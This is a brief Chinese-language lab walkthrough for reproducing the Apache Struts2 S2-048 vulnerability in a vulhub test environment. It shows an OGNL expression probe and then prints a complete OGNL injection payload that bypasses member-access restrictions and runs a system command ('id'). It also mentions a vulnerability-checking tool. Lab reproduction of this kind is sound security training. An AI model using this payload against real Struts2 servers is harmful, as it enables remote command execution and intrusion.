实验环境:vulhub、strusts漏洞测试工具
开始:打开vulhub
进入struts2 -s2-048
查看开放端口
ifconfig找到ip
在浏览器上输入ip地址加上8080端口,如下图所示
在输入框输入${233233},提交
出现54289(233233)的答案,说明存在漏洞
使用代码(加粗为可修改) 可查看到相应的信息。
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)?(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream())).(#q)}
也可使用测试工具
将网址复制上去,点击验证漏洞
出现048漏洞警告
完成!